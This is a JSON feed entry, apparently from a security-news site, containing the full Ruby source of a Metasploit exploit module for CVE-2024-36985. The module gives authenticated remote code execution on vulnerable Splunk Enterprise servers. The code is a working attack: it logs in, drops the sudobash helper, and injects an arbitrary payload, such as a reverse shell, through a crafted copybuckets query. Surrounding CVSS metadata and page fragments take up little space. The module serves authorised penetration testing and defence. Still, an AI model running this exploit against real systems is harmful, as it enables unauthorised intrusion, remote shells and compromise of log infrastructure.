{“lastseen”:”2026-01-21T19:28:02″,”description”:”This Metasploit module exploits a Remote Code Execution RCE vulnerability in Splunk Enterprise splunkarchiver application. The flaw is rooted in the unsafe use of a Splunk lookup function, specifically | copybuckets, within the splunkarchiver…”,”published”:”2026-01-21T18:56:41″,”modified”:”2026-01-21T18:56:41″,”type”:”metasploit”,”title”:”Authenticated RCE in Splunk (splunk_archiver app)”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-LINUX-HTTP-SPLUNK_AUTH_RCE_CVE_2024_36985-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2024-36985″],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Remote\\n Rank = ExcellentRanking\\n\\n include Msf::Exploit::Remote::HttpClient\\n include Msf::Exploit::Remote::HTTP::Splunk\\n prepend Msf::Exploit::Remote::AutoCheck\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Authenticated RCE in Splunk (splunk_archiver app)’,\\n ‘Description’ =\\u003e %q{\\n This Metasploit module exploits a Remote Code Execution (RCE) vulnerability in Splunk Enterprise (splunk_archiver application).\\n\\n The flaw is rooted in the unsafe use of a Splunk lookup function, specifically | copybuckets, within the splunk_archiver application,\\n which ultimately leads to the execution of the helper script sudobash with attacker-controlled arguments.\\n\\n The affected versions include any release prior to 9.0.10, as well as versions 9.1.2 through 9.1.5 and 9.2.0 through 9.2.2.\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Author’ =\\u003e [\\n ‘Maksim Rogov’, # Metasploit Module\\n ‘Alex Hordijk’, # Vulnerability Discovery\\n ‘psytester’ # Public Exploit\\n ],\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2024-36985’],\\n [‘URL’, ‘https:\/\/advisory.splunk.com\/advisories\/SVD-2024-0705’],\\n [‘URL’, ‘https:\/\/web.archive.org\/web\/20240914000921\/https:\/\/psytester.github.io\/CVE-2024-36985_SPLUNK_RCE_PoC\/’],\\n ],\\n ‘Platform’ =\\u003e [‘unix’, ‘linux’],\\n ‘Arch’ =\\u003e [ARCH_CMD],\\n ‘Targets’ =\\u003e [\\n [\\n ‘Splunk \\u003c 9.0.10, 9.1.5, and 9.2.2 \/ Unix payload’,\\n {\\n # Tested with cmd\/unix\/reverse_bash\\n # Tested with cmd\/linux\/http\/x64\/meterpreter\/reverse_tcp\\n }\\n ]\\n ],\\n ‘Payload’ =\\u003e {\\n ‘BadChars’ =\\u003e ‘\\” ‘\\n },\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘DisclosureDate’ =\\u003e ‘2024-07-01’,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘SideEffects’ =\\u003e [IOC_IN_LOGS],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION]\\n }\\n )\\n )\\n\\n register_options(\\n [\\n OptString.new(‘TARGETURI’, [true, ‘Path to the Splunk App’, ‘\/’]),\\n OptString.new(‘USERNAME’, [ true, ‘The username with admin role to authenticate as’, ‘admin’ ]),\\n OptString.new(‘PASSWORD’, [ true, ‘The password for the specified username’]),\\n OptString.new(‘SPLUNK_HOME’, [true, ‘Path to the Splunk home directory’, ‘\/opt\/splunk\/’]),\\n OptBool.new(‘CREATE_SUDOBASH’, [true, ‘Set to false if you are sure that sudobash exists on the target system’, true]),\\n OptInt.new(‘DELAY’, [true, ‘Delay in seconds to wait for sudobash to be dropped to the filesystem’, 3]),\\n ]\\n )\\n end\\n\\n def check\\n @cookie = splunk_login(datastore[‘USERNAME’], datastore[‘PASSWORD’])\\n version = splunk_home_version(@cookie)\\n if version \\u003c= Rex::Version.new(‘9.0.9’) ||\\n version.between?(Rex::Version.new(‘9.1.0’), Rex::Version.new(‘9.1.4’)) ||\\n version.between?(Rex::Version.new(‘9.2.0’), Rex::Version.new(‘9.2.1’))\\n\\n all_apps = get_apps(@cookie)\\n return CheckCode::Detected(\\”Exploitable version found: #{version}, but splunk_archiver app was not found\\”) if !all_apps.key?(‘splunk_archiver’)\\n return CheckCode::Detected(\\”Exploitable version found: #{version}, but splunk_archiver app is disabled\\”) if all_apps[‘splunk_archiver’][:enabled] == false\\n\\n return CheckCode::Appears(\\”Exploitable version found: #{version}, splunk_archiver app is enabled\\”)\\n end\\n\\n return CheckCode::Safe(\\”Non-vulnerable version found: #{version}\\”) if !version.nil?\\n\\n return CheckCode::Unknown(‘Target does not appear to be a Splunk instance’)\\n end\\n\\n # remove duplicate slashes\\n def normalize_path(path)\\n path.gsub(%r{\/+}, ‘\/’)\\n end\\n\\n def get_json_payload(payload)\\n env_name = Rex::Text.rand_text_alpha_upper(8..16)\\n provider = Rex::Text.rand_text_alphanumeric(8..16)\\n\\n # The payload is double-escaped because the entire JSON object must be passed as a literal string value inside the json=\\”…\\” splunk query.\\n {\\n ‘vixes’ =\\u003e {},\\n providers: {\\n provider =\\u003e {\\n ‘command.arg.1’ =\\u003e normalize_path(\\”#{datastore[‘SPLUNK_HOME’]}\/etc\/apps\/splunk_archiver\/java-bin\/jars\/sudobash\\”),\\n ‘command.arg.2’ =\\u003e \\”-c $#{env_name}\\”,\\n \\”env.#{env_name}\\” =\\u003e payload\\n }\\n }\\n }.to_json.to_json\\n end\\n\\n def create_sudobash\\n print_status(‘Sending sudobash create request…’)\\n\\n query = ‘| archivebuckets forcerun=1’\\n search(@target_app, query, @cookie)\\n print_good(‘sudobash create request has been sent!’)\\n\\n print_status(‘Sleep for 3 seconds before it is dropped on the filesystem…’)\\n Rex::ThreadSafe.sleep(datastore[‘DELAY’])\\n print_good(‘Sleep Completed’)\\n end\\n\\n def trigger_exploit\\n print_status(‘Sending trigger exploit request…’)\\n\\n json_payload = get_json_payload(payload.encoded)\\n query = \\”| copybuckets json=#{json_payload}\\”\\n\\n search(@target_app, query, @cookie)\\n end\\n\\n def exploit\\n if @cookie.nil?\\n @cookie = splunk_login(datastore[‘USERNAME’], datastore[‘PASSWORD’])\\n end\\n\\n @target_app = get_random_app(@cookie, enabled: true)\\n\\n if datastore[‘CREATE_SUDOBASH’] == true\\n create_sudobash\\n end\\n\\n trigger_exploit\\n end\\n\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/linux\/http\/splunk_auth_rce_cve_2024_36985.rb”,”cvss”:{“score”:8.8,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/exploit\/linux\/http\/splunk_auth_rce_cve_2024_36985\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-01-21T19:28:02″,”description”:”This Metasploit module exploits a Remote Code Execution RCE vulnerability in Splunk Enterprise splunkarchiver application. The flaw is rooted in the unsafe use of a…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,41,12,15,169,13,7,11,5],"class_list":["post-36728","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-88","tag-exploit","tag-high","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n